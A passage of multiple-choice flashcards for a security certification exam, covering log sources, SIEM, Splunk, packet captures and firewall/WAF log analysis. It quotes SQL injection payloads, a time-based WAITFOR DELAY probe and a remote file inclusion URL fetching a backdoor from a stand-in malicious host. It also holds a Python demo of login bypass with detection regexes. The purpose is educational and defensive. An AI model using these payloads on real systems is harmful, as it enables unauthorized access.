Investigating an Incident Flashcards
Objective 4.9: Given a scenario, you must be able to use data sources to support an investigation
Your organization has deployed a SIEM to monitor security events. You need to configure it properly to ensure meaningful alerts while avoiding excessive data overload. What is the best approach?
A) Collect all log data from every system on the network.
B) Adjust the SIEM’s sensitivity level to balance security monitoring and resource usage.
C) Disable correlation features to reduce processing load.
D) Increase the alert threshold to ignore authentication failures.
✅ Correct Answer: B - Adjust the SIEM’s sensitivity level to balance security monitoring and resource usage.
🔹 Explanation of Options:
(A)❌ Collecting all logs is impractical and will overload the SIEM, leading to performance issues.
(B)✅ Adjusting sensitivity levels ensures that only the most relevant security events are logged, improving efficiency.
(C)❌ Disabling correlation reduces the ability to detect patterns in attacks, weakening security.
(D)❌ Ignoring authentication failures could prevent detection of brute-force attacks or unauthorized access attempts.
A security analyst needs to investigate failed login attempts on Linux servers. Which tool should they use?
A) NetFlow
B) NXLog
C) JournalCTL
D) Syslog-ng
✅ Correct Answer: C - JournalCTL
🔹 Explanation of Options:
(A)❌ NetFlow is for network traffic monitoring, not system logs.
(B)❌ NXLog is a log management tool but not specific to Linux.
(C)✅ JournalCTL queries system logs in Linux (journald), making it the best choice.
(D)❌ Syslog-ng centralizes logs but lacks the same filtering capabilities as JournalCTL.
Your security team needs to detect data exfiltration in real-time. Which monitoring tool is the best choice?
A) NetFlow
B) sFlow
C) IPFIX
D) Journald
✅ Correct Answer: B - sFlow
🔹 Explanation of Options:
(A)❌ NetFlow provides detailed traffic summaries but has export delays.
(B)✅ sFlow captures random packet samples immediately, making it ideal for real-time monitoring.
(C)❌ IPFIX is mainly used for billing and accounting rather than real-time security monitoring.
(D)❌ Journald is a Linux log system, not a network monitoring tool.
Your SIEM is receiving logs from multiple sources, but timestamps are inconsistent across different logs. What is the best solution?
A) Convert all timestamps to UTC.
B) Ignore logs with different time formats.
C) Configure the SIEM to detect local time zones automatically.
D) Only analyze logs using the company’s default time zone.
✅ Correct Answer: A - Convert all timestamps to UTC
🔹 Explanation of Options:
(A)✅ Standardizing timestamps to UTC ensures logs from different time zones align properly.
(B)❌ Ignoring logs could result in missing key security events.
(C)❌ Automatic time zone detection may cause inconsistencies and conflicts.
(D)❌ Restricting to one time zone can cause discrepancies when investigating global events.
Which log type would be most useful for investigating whether an attacker has accessed restricted files?
A) Authentication logs
B) Web logs
C) DNS logs
D) System logs
✅ Correct Answer: A - Authentication logs
🔹 Explanation of Options:
(A)✅ Authentication logs track user login attempts, providing insight into unauthorized access.
(B)❌ Web logs record website visits but don’t track file access.
(C)❌ DNS logs track domain name requests, not file access.
(D)❌ System logs provide general OS events but may not directly show file access patterns.
A network admin needs a standardized method to export network flow data for both billing and security monitoring. Which tool should they use?
A) NetFlow
B) sFlow
C) IPFIX
D) NXLog
✅ Correct Answer: C - IPFIX
🔹 Explanation of Options:
(A)❌ NetFlow is Cisco-proprietary, while IPFIX is an open standard.
(B)❌ sFlow captures sampled data but lacks detailed billing capabilities.
(C)✅ IPFIX is a universal flow export standard used in billing and security monitoring.
(D)❌ NXLog is for log management, not network flow exporting.
An analyst is investigating a suspected phishing attack. What type of metadata would be most useful?
A) File metadata
B) Mobile metadata
C) Email metadata
D) Web metadata
✅ Correct Answer: C - Email metadata
🔹 Explanation of Options:
(A)❌ File metadata provides details about documents, not phishing emails.
(B)❌ Mobile metadata tracks call details, irrelevant to phishing emails.
(C)✅ Email metadata helps analyze sender details, email headers, and timestamps to track phishing sources.
(D)❌ Web metadata shows website visits but doesn’t trace phishing emails.
Which log management tool is best for a company that needs Windows, Linux, and Unix compatibility?
A) Syslog-ng
B) NXLog
C) JournalCTL
D) NetFlow
✅ Correct Answer: B - NXLog
🔹 Explanation of Options:
(A)❌ Syslog-ng is mainly for Unix/Linux, not cross-platform.
(B)✅ NXLog works across Windows, Linux, and Unix, making it the best choice.
(C)❌ JournalCTL is Linux-specific and cannot manage Windows logs.
(D)❌ NetFlow is for network traffic monitoring, not log management.
Your SIEM is slowing down due to excessive log data. What is the best way to optimize performance?
A) Reduce sensor sensitivity to collect fewer logs.
B) Disable log collection from low-priority systems.
C) Increase storage and processing power to handle all logs.
D) Implement log filtering to collect only relevant security events.
✅ Correct Answer: D - Implement log filtering to collect only relevant security events
🔹 Explanation of Options:
(A)❌ Reducing sensitivity might cause important events to be missed.
(B)❌ Disabling low-priority logs could lead to blind spots in security monitoring.
(C)❌ Increasing storage is a temporary fix but doesn’t improve efficiency.
(D)✅ Log filtering ensures that only the most critical logs are collected.
A company has deployed Splunk to monitor security threats across its infrastructure. Which of the following best describes Splunk’s primary function?
A) A security appliance that actively blocks threats.
B) A big data platform that collects and indexes security-related data.
C) A firewall designed to filter malicious network traffic.
D) A replacement for SIEM solutions.
✅ Correct Answer: B - A big data platform that collects and indexes security-related data
🔹 Explanation of Options:
(A)❌ Splunk is not a security appliance; it analyzes and visualizes data but does not block threats.
(B)✅ Splunk is a powerful data analytics tool that collects, indexes, and processes security data from multiple sources.
(C)❌ Firewalls control traffic flow, but Splunk is used for log analysis and security insights.
(D)❌ While Splunk integrates with SIEM tools, it does not fully replace traditional SIEM solutions.
A security analyst logs into Splunk and needs a quick summary of security alerts across multiple systems. What feature should they use?
A) Raw log data view
B) Dashboards
C) Command-line interface
D) Packet capture utility
✅ Correct Answer: B - Dashboards
🔹 Explanation of Options:
(A)❌ Raw log data is useful but not as efficient for quick summaries.
(B)✅ Dashboards provide a graphical overview of system activity, making them ideal for incident response.
(C)❌ A command-line interface can query data but lacks visual summaries.
(D)❌ Packet capture utilities analyze network traffic but are not a part of Splunk’s dashboard feature.
A company’s Splunk dashboard is showing a rising number of threat counts over the past 24 hours. What does this indicate?
A) The organization is detecting an increased number of security threats.
B) The system is experiencing hardware failure.
C) The company’s antivirus software is malfunctioning.
D) The Splunk server is under a denial-of-service (DoS) attack.
✅ Correct Answer: A - The organization is detecting an increased number of security threats
🔹 Explanation of Options:
(A)✅ A rise in threat counts means more malicious activity is being detected.
(B)❌ Hardware failures are unrelated to threat counts.
(C)❌ Antivirus issues would likely generate different alerts, not an increase in threat counts.
(D)❌ A DoS attack would cause performance issues but wouldn’t directly increase threat counts in Splunk.
Which of the following best describes the Single Pane of Glass concept in Splunk?
A) A tool that blocks cyberattacks before they happen.
B) A dashboard that consolidates security data from multiple systems into one view.
C) A physical security camera monitoring system.
D) A new type of firewall security protocol.
✅ Correct Answer: B - A dashboard that consolidates security data from multiple systems into one view
🔹 Explanation of Options:
(A)❌ Splunk does not proactively block attacks; it analyzes security data.
(B)✅ A Single Pane of Glass provides a unified view of multiple data sources, helping analysts respond efficiently.
(C)❌ Security camera monitoring systems are unrelated to Splunk.
(D)❌ Firewalls operate at the network level, while the Single Pane of Glass concept is for data visualization.
Which of the following data sources can be ingested into Splunk?
A) Firewalls
B) Intrusion Detection Systems (IDS)
C) Endpoint security logs
D) All of the above
✅ Correct Answer: D - All of the above
🔹 Explanation of Options:
(A)✅ Firewalls generate logs on network traffic, which can be analyzed in Splunk.
(B)✅ IDS alerts can be ingested into Splunk for correlation with other security data.
(C)✅ Endpoint security logs provide insights into malware infections and unauthorized access.
(D)✅ Splunk collects data from multiple sources, making (D) the best answer.
A security analyst wants to monitor security incidents over time using Splunk. What feature should they use?
A) Packet inspection tools
B) Dashboards
C) SIEM correlation rules
D) Antivirus scan logs
✅ Correct Answer: B - Dashboards
🔹 Explanation of Options:
(A)❌ Packet inspection tools focus on real-time network traffic, not long-term trends.
(B)✅ Dashboards help visualize security trends over time, making them the best choice.
(C)❌ SIEM correlation rules help analyze attack patterns but do not provide trend visualization.
(D)❌ Antivirus scan logs show malware detection history but do not present broad security trends.
A company wants to track trends in malicious activity using Splunk. What feature should they use?
A) Threat Counts
B) Packet captures
C) System error logs
D) DNS cache records
✅ Correct Answer: A - Threat Counts
🔹 Explanation of Options:
(A)✅ Threat Counts track security threats over time and help assess trends in attacks.
(B)❌ Packet captures analyze network traffic but are not used for tracking trends.
(C)❌ System error logs focus on hardware/software issues, not security threats.
(D)❌ DNS cache records track website lookups, not malicious activity trends.
A security analyst starts an incident investigation and needs a central starting point to gather security insights. What should they use?
A) Command-line queries
B) The Splunk Dashboard
C) Network firewall settings
D) System performance logs
✅ Correct Answer: B - The Splunk Dashboard
🔹 Explanation of Options:
(A)❌ Command-line queries are powerful but not an ideal starting point.
(B)✅ Dashboards provide an overview of security incidents, making them the best starting point.
(C)❌ Network firewall settings focus on access control, not security analysis.
(D)❌ System performance logs track hardware and application performance, not security threats.
Your organization uses an automated report system to track security incidents. Which of the following best describes an automated report?
A) A manually written document prepared by an IT analyst.
B) A report that is automatically generated by a security tool at scheduled intervals.
C) A document created only after a major security breach.
D) A report that only logs hardware failures.
✅ Correct Answer: B - A report that is automatically generated by a security tool at scheduled intervals.
🔹 Explanation of Options:
(A)❌ Automated reports are system-generated, not manually written.
(B)✅ Automated reports are generated at set intervals by security tools like EDR, SIEM, or antivirus software.
(C)❌ Reports are generated regularly, not just after major incidents.
(D)❌ They track security threats, not just hardware failures.
Which of the following is NOT typically included in an automated security incident report?
A) Report ID
B) Executive Summary
C) User Social Security Numbers
D) Incident Details
✅ Correct Answer: C - User Social Security Numbers
🔹 Explanation of Options:
(A)✅ A Report ID is a unique identifier for tracking incidents.
(B)✅ The Executive Summary gives a brief overview of the report.
(C)❌ Sensitive personal data like SSNs should never be included in security reports.
(D)✅ Incident Details contain timestamps, affected systems, and actions taken.
In an automated security report, incidents are categorized by severity levels. A brute-force attack on an admin account leading to multiple failed login attempts would most likely be classified as:
A) Informational
B) Moderate
C) High
D) Critical
✅ Correct Answer: C - High
🔹 Explanation of Options:
(A)❌ Informational alerts track non-threatening events like software installations.
(B)❌ Moderate alerts are for suspicious activity that needs review but is not immediately dangerous.
(C)✅ High alerts include multiple failed login attempts, indicating a possible brute-force attack.
(D)❌ Critical alerts involve confirmed major threats (e.g., ransomware execution or confirmed data breach).
An automated security report flags a critical alert for suspicious file access at 4:53 AM, outside of normal working hours. What is the best first step in investigating this incident?
A) Immediately delete the affected user account.
B) Verify whether the activity matches known ransomware patterns.
C) Ignore it, as employees may work late hours.
D) Restart the file server to clear any suspicious processes.
✅ Correct Answer: B - Verify whether the activity matches known ransomware patterns.
🔹 Explanation of Options:
(A)❌ Deleting the account immediately may disrupt operations. Investigation is needed first.
(B)✅ Matching the behavior to known ransomware footprints helps determine if the alert is a true security threat.
(C)❌ Ignoring alerts without investigation can allow security breaches to go undetected.
(D)❌ Restarting the server doesn’t address the cause of the suspicious activity.
A security report identifies a malicious IP address communicating with an internal system. What automated response would be most appropriate?
A) Blocking the IP address to prevent further communication.
B) Sending a report and waiting for manual intervention.
C) Notifying the user and allowing them to decide whether to block the connection.
D) Deleting all network logs related to the suspicious activity.
✅ Correct Answer: A - Blocking the IP address to prevent further communication.
🔹 Explanation of Options:
(A)✅ Automatically blocking a malicious IP is a standard incident response action.
(B)❌ Waiting for manual intervention could allow further damage.
(C)❌ Users should not decide whether to block a security threat.
(D)❌ Deleting logs hides evidence and hinders investigations.
An automated report flags unusual outbound traffic from a database server to an external IP address. What should the security team do next?
A) Assume it is a scheduled backup and ignore it.
B) Analyze the destination IP to determine if it is a trusted source.
C) Reset all user passwords in the organization.
D) Permanently disconnect the database server.
✅ Correct Answer: B - Analyze the destination IP to determine if it is a trusted source.
🔹 Explanation of Options:
(A)❌ Assuming it’s a backup without verification is a security risk.
(B)✅ Investigating the destination IP helps determine if the traffic is benign or malicious.
(C)❌ Resetting all passwords is unnecessary unless a confirmed breach has occurred.
(D)❌ Disconnecting the database permanently would disrupt business operations.
An automated report flags that user msmith installed FileZilla FTP software on Workstation 22. What is the best first step in investigating this?
A) Immediately fire the employee for violating policy.
B) Check if the file hash matches a known safe version.
C) Assume it was a legitimate installation and take no further action.
D) Format the workstation to eliminate any possible threats.
✅ Correct Answer: B - Check if the file hash matches a known safe version.
🔹 Explanation of Options:
(A)❌ Firing an employee without investigation is an overreaction.
(B)✅ Verifying the file hash ensures the software was not modified or malicious.
(C)❌ Assuming legitimacy without verification is a security risk.
(D)❌ Formatting the workstation is unnecessary unless a threat is confirmed.
Which of the following sections of an automated report provides a high-level summary of security incidents for decision-makers?
A) Incident Details
B) Executive Summary
C) Appendices
D) Security Recommendations
✅ Correct Answer: B - Executive Summary
🔹 Explanation of Options:
(A)❌ Incident Details provide timestamps, affected systems, and technical data, not a high-level overview.
(B)✅ The Executive Summary allows decision-makers to quickly assess the report’s relevance.
(C)❌ Appendices contain supporting logs and raw data but not a summary.
(D)❌ Security Recommendations suggest mitigation steps, not a summary of findings.
A cybersecurity analyst runs a vulnerability scan across a company’s network. After receiving the automated vulnerability scan report, what should be their first step before sharing it with executives?
A) Immediately forward the report to executives without reviewing it.
B) Perform an analysis to validate whether the detected vulnerabilities are real.
C) Delete any findings that appear to be false positives.
D) Only focus on the vulnerabilities labeled as Critical and ignore the rest.
✅ Correct Answer: B - Perform an analysis to validate whether the detected vulnerabilities are real.
🔹 Explanation of Options:
(A)❌ Forwarding the report without analysis can lead to confusion and misinterpretation.
(B)✅ Validating vulnerabilities ensures false positives are removed, and critical issues are addressed appropriately.
(C)❌ Deleting findings without verification may lead to ignoring real threats.
(D)❌ Focusing only on Critical vulnerabilities overlooks High/Medium risks, which could still be exploited.
A vulnerability scan flags a critical Windows patch vulnerability on a Linux server. What does this indicate?
A) A true positive that requires immediate patching.
B) A false positive due to incorrect vulnerability identification.
C) A configuration issue in the Linux server’s firewall.
D) A misconfiguration in the Windows update settings.
✅ Correct Answer: B - A false positive due to incorrect vulnerability identification.
🔹 Explanation of Options:
(A)❌ Linux servers don’t use Windows patches, so this is likely incorrect.
(B)✅ This is a false positive since Windows vulnerabilities don’t apply to Linux systems.
(C)❌ Firewalls don’t determine the presence of software vulnerabilities.
(D)❌ Windows update settings are irrelevant on a Linux machine.
A vulnerability affecting Microsoft Exchange Server has a CVSS score of 9.1, while another affecting a single workstation has a CVSS score of 7.5. Why does the Exchange Server vulnerability have a higher score?
A) Workstations are more secure than Exchange Servers.
B) Exchange Server vulnerabilities impact a larger number of users.
C) The workstation vulnerability requires authentication, making it more dangerous.
D) CVSS scores are randomly assigned by security teams.
✅ Correct Answer: B - Exchange Server vulnerabilities impact a larger number of users.
🔹 Explanation of Options:
(A)❌ Workstations are not inherently more secure.
(B)✅ A compromised Exchange Server affects email for an entire organization, increasing risk.
(C)❌ Authentication does not always make a vulnerability more dangerous.
(D)❌ CVSS scores are based on an industry-standard formula, not random assignments.
Which of the following describes an unauthenticated attacker?
A) An insider with valid login credentials misusing their access.
B) An attacker outside the organization exploiting an open RDP port.
C) An employee using admin privileges to alter financial records.
D) A user who failed to install the latest Windows patch.
✅ Correct Answer: B - An attacker outside the organization exploiting an open RDP port.
🔹 Explanation of Options:
(A)❌ An authenticated attacker is an insider threat.
(B)✅ An unauthenticated attacker has no prior access and exploits public-facing vulnerabilities.
(C)❌ Misusing admin privileges is an insider threat.
(D)❌ Not installing updates is risky, but it doesn’t define an attacker.
A vulnerability scan flags 50% of company workstations as missing a five-year-old security patch. What should the cybersecurity team report to executives?
A) The presence of a patch management problem in the organization.
B) Each workstation’s individual vulnerabilities in detail.
C) Only a list of vulnerabilities rated Critical.
D) Ignore the finding since the patch is old.
✅ Correct Answer: A - The presence of a patch management problem in the organization.
🔹 Explanation of Options:
(A)✅ A widespread missing patch indicates a systemic issue with patch management.
(B)❌ Listing individual workstation vulnerabilities overwhelms executives with too much data.
(C)❌ Focusing only on Critical vulnerabilities ignores trends affecting overall security.
(D)❌ Old vulnerabilities can still be exploited if left unpatched.
A medium-severity vulnerability (CVSS 6.5) affecting an Apache Druid server allows remote code execution but requires a specifically crafted request. What does this mean?
A) It is difficult to exploit, but still poses a risk.
B) It is an informational finding with no security risk.
C) The vulnerability should be ignored due to its medium severity.
D) It should be classified as Critical because it allows remote code execution.
✅ Correct Answer: A - It is difficult to exploit, but still poses a risk.
🔹 Explanation of Options:
(A)✅ Some vulnerabilities require complex attack methods, making them less critical but still important.
(B)❌ Remote code execution is a security risk, not just an informational finding.
(C)❌ Medium-severity vulnerabilities should still be evaluated.
(D)❌ CVSS scoring considers exploitation difficulty, so not all RCE vulnerabilities are Critical.
A vulnerability scan detects multiple outdated SSL certificates and unused services running on several machines. What should the security team do?
A) Immediately disable all services, even if they are needed.
B) Investigate whether the SSL certificates and services are still in use.
C) Ignore the issue since it is a low-severity finding.
D) Recommend that all employees update their passwords.
✅ Correct Answer: B - Investigate whether the SSL certificates and services are still in use.
🔹 Explanation of Options:
(A)❌ Disabling essential services may cause downtime.
(B)✅ If services or certificates are unused, they should be removed to reduce attack surface.
(C)❌ Even low-severity issues should be reviewed to ensure they don’t become larger threats.
(D)❌ Password updates do not resolve SSL certificate or service misconfiguration issues.
A legacy server is flagged for a Log4j vulnerability (CVE-2021-44228). The scan report states that the risk is mitigated by network controls. What should be done next?
A) No further action is required since it is already mitigated.
B) Completely remove the legacy server from the network.
C) Verify that the network controls are sufficient and monitor for potential risks.
D) Increase the CVSS score since it’s a known high-profile vulnerability.
✅ Correct Answer: C - Verify that the network controls are sufficient and monitor for potential risks.
🔹 Explanation of Options:
(A)❌ Even mitigated vulnerabilities should be reviewed to ensure ongoing security.
(B)❌ Removing a legacy server may not be possible if it’s still in use.
(C)✅ Reviewing mitigations ensures the system remains protected from exploitation.
(D)❌ CVSS scores are standardized; they don’t change based on individual security controls.
A security analyst is tasked with monitoring network activity and decides to use packet capture software. What is the primary purpose of a packet capture?
A) To capture all incoming and outgoing data on a network device.
B) To modify traffic between devices for security testing.
C) To automatically block malicious IP addresses.
D) To replace the need for firewall logs.
✅ Correct Answer: A - To capture all incoming and outgoing data on a network device.
🔹 Explanation of Options:
(A)✅ Packet captures log all network traffic for analysis.
(B)❌ Packet captures only observe traffic; they do not modify it.
(C)❌ Blocking traffic is the function of firewalls or intrusion prevention systems (IPS).
(D)❌ Firewalls and packet captures serve different roles—firewalls filter traffic, while packet captures record it.
A security analyst notices that the Time column in a packet capture does not show a traditional date and time format. Instead, it displays elapsed time. What does this indicate?
A) The timestamps are corrupted and cannot be used.
B) The packet capture is showing time relative to the start of the capture.
C) The network clock is misconfigured.
D) The packet capture is using a faulty packet sniffer.
✅ Correct Answer: B - The packet capture is showing time relative to the start of the capture.
🔹 Explanation of Options:
(A)❌ The timestamps are not corrupted; this is standard behavior.
(B)✅ Packet captures show the time elapsed since the capture began, allowing analysts to track packet timing.
(C)❌ A misconfigured network clock affects log synchronization, not packet captures.
(D)❌ Packet sniffers are designed to collect data, not modify timestamp formats.
A packet capture shows multiple SYN packets being sent to various ports on a single destination IP without receiving SYN-ACK responses. What type of attack is most likely occurring?
A) Distributed Denial of Service (DDoS) attack
B) SYN Flood attack
C) Port Scan
D) Man-in-the-Middle (MITM) attack
✅ Correct Answer: C - Port Scan
🔹 Explanation of Options:
(A)❌ A DDoS attack involves multiple sources targeting a single destination.
(B)❌ A SYN flood overwhelms a server with half-open connections, but this scenario describes scanning different ports.
(C)✅ A Port Scan sends SYN packets to different ports on a single IP to identify open ports.
(D)❌ MITM attacks involve intercepting communications rather than scanning ports.
A packet capture reveals a large number of SYN packets sent from a single source IP to a single destination, but no SYN-ACK responses are observed. What attack type does this indicate?
A) Normal TCP handshake process
B) SYN Flood attack
C) DNS Spoofing attack
D) SQL Injection attack
✅ Correct Answer: B - SYN Flood attack
🔹 Explanation of Options:
(A)❌ A normal TCP handshake includes SYN, SYN-ACK, and ACK packets. Here, SYN-ACK responses are missing.
(B)✅ A SYN Flood attack occurs when an attacker sends numerous SYN requests but never completes the handshake, exhausting server resources.
(C)❌ DNS Spoofing manipulates domain name resolution, unrelated to SYN packets.
(D)❌ SQL Injection attacks exploit databases, not network packets.
A security analyst notices multiple SYN packets targeting the same destination IP, but they originate from different source IP addresses. What does this indicate?
A) A misconfigured firewall
B) A Distributed Denial of Service (DDoS) attack
C) A network performance issue
D) A normal communication pattern
✅ Correct Answer: B - A Distributed Denial of Service (DDoS) attack
🔹 Explanation of Options:
(A)❌ A misconfigured firewall might allow malicious traffic but does not generate SYN floods.
(B)✅ A DDoS attack uses multiple compromised devices (botnets) to flood a target with requests, exhausting resources.
(C)❌ Network performance issues are unrelated to SYN packet floods.
(D)❌ A high volume of SYN requests from multiple sources targeting one server is not normal.
On the exam, packet captures will typically be:
A) Full network logs containing gigabytes of data.
B) Short snippets with 5 to 20 lines of packet data.
C) A live capture requiring real-time analysis.
D) Packets from multiple networks mixed together.
✅ Correct Answer: B - Short snippets with 5 to 20 lines of packet data.
🔹 Explanation of Options:
(A)❌ Full network logs are impractical for exam questions.
(B)✅ The exam provides small snippets for analysis, focusing on key attack indicators.
(C)❌ The exam does not require live analysis, only interpretation of given data.
(D)❌ Exam packet captures are structured, not randomly mixed from different networks.
In a packet capture, the Protocol column shows different values. Which of the following protocols is most commonly seen in packet captures?
A) TCP and UDP
B) ICMP and ARP only
C) SMTP and POP3
D) DNS and HTTP only
✅ Correct Answer: A - TCP and UDP
🔹 Explanation of Options:
(A)✅ TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) are the two primary transport layer protocols in network traffic.
(B)❌ ICMP and ARP appear, but TCP and UDP are more common in standard network traffic.
(C)❌ SMTP and POP3 are email-related protocols, not primary transport protocols.
(D)❌ DNS and HTTP are application-layer protocols; TCP/UDP operate at the transport layer.
A packet capture shows a Length column with all packets having a length of 74 bytes. What does this indicate?
A) The packets are likely part of an attack pattern.
B) The network has no issues, and this is normal behavior.
C) The packets contain large data payloads.
D) The capture software is corrupted and cannot analyze packet size.
✅ Correct Answer: A - The packets are likely part of an attack pattern.
🔹 Explanation of Options:
(A)✅ Attack patterns often involve small, uniform packets, such as SYN floods or port scans.
(B)❌ Consistently small packet sizes could indicate scanning, not normal behavior.
(C)❌ 74-byte packets are small; large payloads require much larger packet sizes.
(D)❌ Capture software is unlikely to misreport length data.
A security analyst reviews a firewall log snippet and notices that all inbound connection attempts from 185.76.9.23 to 192.168.1.105 on ports 22, 80, 443, and 8080 were blocked. What does this most likely indicate?
A) A SYN flood attack targeting a specific server.
B) A port scan attempting to discover open services.
C) A Distributed Denial of Service (DDoS) attack.
D) A normal firewall operation allowing traffic.
✅ Correct Answer: B - A port scan attempting to discover open services.
🔹 Explanation of Options:
(A)❌ SYN floods generate numerous SYN packets, but this log shows scanning of multiple ports.
(B)✅ The log shows an attacker systematically probing different ports, indicating a port scan.
(C)❌ DDoS attacks involve high traffic from multiple sources; this log only shows one source IP.
(D)❌ Since the firewall blocked all attempts, this was not normal traffic flow.
A web application firewall log contains the following suspicious request:
GET /index.php?id='OR '1'='1' --
What type of attack does this indicate?
A) Local File Inclusion (LFI)
B) SQL Injection
C) Cross-Site Scripting (XSS)
D) Directory Traversal
✅ Correct Answer: B - SQL Injection
🔹 Explanation of Options:
(A)❌ LFI exploits file-loading mechanisms, not SQL queries.
(B)✅ The '1'='1' condition is a common SQL Injection attempt used to bypass authentication.
(C)❌ XSS injects malicious scripts into a webpage, not SQL queries.
(D)❌ Directory traversal involves accessing restricted directories, not manipulating SQL queries.
A WAF log contains the following entry:
POST /login.php HTTP/1.1 → Response: 403 Forbidden
What does the 403 status code indicate?
A) The request was successfully processed.
B) The request was blocked due to access restrictions.
C) The login credentials were incorrect.
D) The login request resulted in a syntax error.
✅ Correct Answer: B - The request was blocked due to access restrictions.
🔹 Explanation of Options:
(A)❌ A successful request would return a 200 status code.
(B)✅ A 403 Forbidden response means the server rejected the request due to security policies.
(C)❌ Incorrect form credentials are normally reported by the application itself (usually a 200 with an error message, or a redirect back to the form); 401 Unauthorized is the code for failed HTTP authentication. Neither produces a 403.
(D)❌ A malformed request returns 400 Bad Request, and an unhandled server-side error (for example a broken SQL statement) surfaces as 500 Internal Server Error, not 403.
A firewall log shows the following search query request:
GET /search?q='; WAITFOR DELAY '00:00:10' --
What is the attacker trying to do?
A) Exploit time-based SQL injection by causing the database to delay its response.
B) Perform directory traversal to access restricted files.
C) Inject a cross-site scripting (XSS) attack into a web application.
D) Execute a remote file inclusion (RFI) attack.
✅ Correct Answer: A - Exploit time-based SQL injection by causing the database to delay its response.
🔹 Explanation of Options:
(A)✅ WAITFOR DELAY is a Microsoft SQL Server (T-SQL) statement that pauses execution for the given interval. If the response arrives about 10 seconds later than normal, the attacker learns, without seeing any data, that the input reaches the database unsanitized and that the backend is SQL Server. This is blind, time-based SQL injection.
(B)❌ Directory traversal involves navigating system directories (e.g., ../../etc/passwd).
(C)❌ XSS involves inserting malicious scripts into web pages, not SQL queries.
(D)❌ RFI loads external files from remote servers but does not interact with SQL databases.
A WAF log detects an attempt to execute the following command:
GET /index.php?file=http://malicious.com/backdoor.php
Which type of attack does this indicate?
A) SQL Injection
B) Cross-Site Scripting (XSS)
C) Remote File Inclusion (RFI)
D) SYN Flood
✅ Correct Answer: C - Remote File Inclusion (RFI)
🔹 Explanation of Options:
(A)❌ SQL injection manipulates database queries, not file loading mechanisms.
(B)❌ XSS attacks inject JavaScript into webpages, but this attack loads an external file.
(C)✅ The value of the file parameter is handed to an include-style function, so the application fetches and executes a script from an attacker-controlled host (in PHP this works only when allow_url_include is enabled). The root cause is using a request-supplied path or URL as an include target without validation.
(D)❌ SYN floods overwhelm servers with connection requests but do not involve file inclusion.
A firewall log shows blocked inbound connections on ports 22, 80, and 443 from a suspicious IP. What type of firewall is likely blocking these requests?
A) Layer 7 Web Application Firewall (WAF)
B) Layer 4 Firewall (Network Firewall)
C) Intrusion Detection System (IDS)
D) Stateful Packet Inspection (SPI)
✅ Correct Answer: B - Layer 4 Firewall (Network Firewall)
🔹 Explanation of Options:
(A)❌ WAF operates at Layer 7 and blocks attacks based on content, not just ports.
(B)✅ Layer 4 firewalls filter traffic based on ports and IP addresses, making them responsible for blocking port scans.
(C)❌ IDS detects intrusions but does not actively block traffic.
(D)❌ Stateful packet inspection is a capability of Layer 4 firewalls (tracking connection state alongside ports and addresses), not a separate device type; the question asks which kind of firewall is doing the blocking.
During the exam, what type of firewall log snippets should you expect to analyze?
A) Full firewall logs with thousands of lines of data.
B) Short logs with 10-20 lines, focusing on specific attack attempts.
C) Live network captures requiring real-time monitoring.
D) Mixed logs from different networks with random data.
✅ Correct Answer: B - Short logs with 10-20 lines, focusing on specific attack attempts.
🔹 Explanation of Options:
(A)❌ Full logs are too large for an exam scenario.
(B)✅ Exam logs are small snippets, highlighting clear attack patterns.
(C)❌ The exam does not require real-time packet capture monitoring.
(D)❌ Exam logs are structured to test knowledge, not random logs.
A web application firewall log shows an attempt to log in with the following credentials:
Username: admin' OR '1'='1' --
Password: password123
What is the attacker trying to do?
A) Perform a brute-force attack.
B) Inject SQL commands to bypass authentication.
C) Execute a denial-of-service attack.
D) Exploit cross-site scripting (XSS).
✅ Correct Answer: B - Inject SQL commands to bypass authentication.
🔹 Explanation of Options:
(A)❌ Brute-force attacks use multiple login attempts, not SQL injections.
(B)✅ The quote closes the username string, OR '1'='1' makes the WHERE clause always true, and -- comments out the password check, so a query assembled by string concatenation returns a row without valid credentials.
(C)❌ DoS attacks flood a server with traffic but do not involve login attempts.
(D)❌ XSS attacks inject JavaScript, not SQL queries.
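Added example (not part of the original flashcards) covering the three SQL injection cards above: the login bypass payload run against a query built by string concatenation, the same payload against a parameterized query, and a minimal WAF-style signature check for both the tautology and the WAITFOR DELAY probe. It uses Python's built-in sqlite3 with a constructed in-memory user table; the account names and passwords are made up.

```python
import re
import sqlite3

# Constructed demo accounts. Passwords are stored in clear text only to keep
# the injection visible; real systems store salted hashes.
USERS = [("admin", "Tr0ub4dor&3"), ("jdoe", "hunter2")]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn

def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, so attacker input becomes
    part of the SQL text. Returns the matched username or None."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    # With username = admin' OR '1'='1' -- the statement becomes:
    # SELECT username FROM users WHERE username = 'admin' OR '1'='1' --' AND ...
    # The tautology matches every row and -- comments out the password check.
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Same lookup with bound parameters: the driver sends values separately
    from the statement, so quotes in the input can never alter its structure."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# Minimal WAF-style signatures for the two probes on this page. Signature
# matching is easy to evade (encoding, comments, case tricks); it complements
# parameterized queries, it does not replace them.
SQLI_PATTERNS = [
    re.compile(r"'\s*or\s*'1'\s*=\s*'1", re.I),   # tautology ' OR '1'='1
    re.compile(r";\s*waitfor\s+delay\s+'", re.I),  # T-SQL time-based probe
]

def looks_like_sqli(value):
    return any(p.search(value) for p in SQLI_PATTERNS)

if __name__ == "__main__":
    payload = "admin' OR '1'='1' --"
    print("vulnerable:", login_vulnerable(make_db(), payload, "password123"))
    print("safe:      ", login_safe(make_db(), payload, "password123"))
    print("flagged:   ", looks_like_sqli(payload))
```

The vulnerable function returns "admin" for the payload because the first row of the now-unconditional result set is the admin account; the safe function looks for a user literally named admin' OR '1'='1' -- and finds nothing. The `-- ` comment syntax and string-comparison semantics shown here are SQLite's; the attack works the same way against the other major engines.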
A security analyst is reviewing application logs on a Windows system. Where is the most likely location for these logs?
A) Inside the individual application’s folder.
B) In a centralized logging system like SIEM or Syslog server.
C) In the Windows Event Viewer Application Log.
D) All of the above.
✅ Correct Answer: D - All of the above.
🔹 Explanation of Options:
(A)✅ Application logs may be stored locally inside their own folders.
(B)✅ Logs can also be sent to SIEM or Syslog servers for centralized monitoring.
